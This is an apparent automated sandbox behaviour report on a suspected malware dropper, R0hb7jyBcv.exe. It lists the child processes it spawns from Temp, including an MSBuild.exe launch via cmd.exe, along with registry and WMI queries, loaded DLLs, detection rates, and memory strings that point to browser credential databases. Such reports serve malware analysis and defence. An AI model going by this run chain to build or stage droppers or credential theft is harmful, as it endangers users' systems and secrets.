Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: .exe	0_2_02504C75
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: .exe	0_2_02504C75

Source: R0hb7jyBcv.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ProcessorId FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor

Source: C:\Users\user\Desktop\R0hb7jyBcv.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\R0hb7jyBcv.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: u5g0.0.exe, 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmp, u5g0.0.exe, 00000001.00000002.2087493033.000000001D230000.00000004.00000020.00020000.00000000.sdmp, u5g0.0.exe, 00000001.00000002.2100500990.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: u5g0.0.exe, 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmp, u5g0.0.exe, 00000001.00000002.2087493033.000000001D230000.00000004.00000020.00020000.00000000.sdmp, u5g0.0.exe, 00000001.00000002.2100500990.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: u5g0.0.exe, 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmp, u5g0.0.exe, 00000001.00000002.2087493033.000000001D230000.00000004.00000020.00020000.00000000.sdmp, u5g0.0.exe, 00000001.00000002.2100500990.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: u5g0.0.exe, 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmp, u5g0.0.exe, 00000001.00000002.2087493033.000000001D230000.00000004.00000020.00020000.00000000.sdmp, u5g0.0.exe, 00000001.00000002.2100500990.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: u5g0.0.exe, u5g0.0.exe, 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmp, u5g0.0.exe, 00000001.00000002.2087493033.000000001D230000.00000004.00000020.00020000.00000000.sdmp, u5g0.0.exe, 00000001.00000002.2100500990.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: u5g0.0.exe, 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmp, u5g0.0.exe, 00000001.00000002.2087493033.000000001D230000.00000004.00000020.00020000.00000000.sdmp, u5g0.0.exe, 00000001.00000002.2100500990.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: u5g0.0.exe, 00000001.00000002.2087493033.000000001D230000.00000004.00000020.00020000.00000000.sdmp, u5g0.0.exe, 00000001.00000002.2100500990.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: u5g0.0.exe, 00000001.00000003.1815438854.00000000231A4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: u5g0.0.exe, 00000001.00000002.2087493033.000000001D230000.00000004.00000020.00020000.00000000.sdmp, u5g0.0.exe, 00000001.00000002.2100500990.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: u5g0.0.exe, 00000001.00000002.2087493033.000000001D230000.00000004.00000020.00020000.00000000.sdmp, u5g0.0.exe, 00000001.00000002.2100500990.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: R0hb7jyBcv.exe	Virustotal: Detection: 36%
Source: R0hb7jyBcv.exe	ReversingLabs: Detection: 32%

Source: C:\Users\user\Desktop\R0hb7jyBcv.exe

File read: C:\Users\user\Desktop\R0hb7jyBcv.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\R0hb7jyBcv.exe "C:\Users\user\Desktop\R0hb7jyBcv.exe"
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Process created: C:\Users\user\AppData\Local\Temp\u5g0.0.exe "C:\Users\user\AppData\Local\Temp\u5g0.0.exe"
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Process created: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe "C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe"
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Process created: C:\Users\user\AppData\Local\Temp\u5g0.3.exe "C:\Users\user\AppData\Local\Temp\u5g0.3.exe"
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7056 -s 1144
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe "C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Process created: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe "C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\IIIJECAEGD.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\IIIJECAEGD.exe "C:\Users\user\AppData\Local\Temp\IIIJECAEGD.exe"
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5408 -s 2364
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Process created: C:\Users\user\AppData\Local\Temp\u5g0.0.exe "C:\Users\user\AppData\Local\Temp\u5g0.0.exe"	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Process created: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe "C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe"	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Process created: C:\Users\user\AppData\Local\Temp\u5g0.3.exe "C:\Users\user\AppData\Local\Temp\u5g0.3.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\IIIJECAEGD.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Process created: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe "C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\IIIJECAEGD.exe "C:\Users\user\AppData\Local\Temp\IIIJECAEGD.exe"

Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: zipfldr.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: winshfhc.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: wdscore.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: winshfhc.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: wdscore.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Section loaded: oledlg.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Section loaded: uxtheme.dll	Jump to behavior
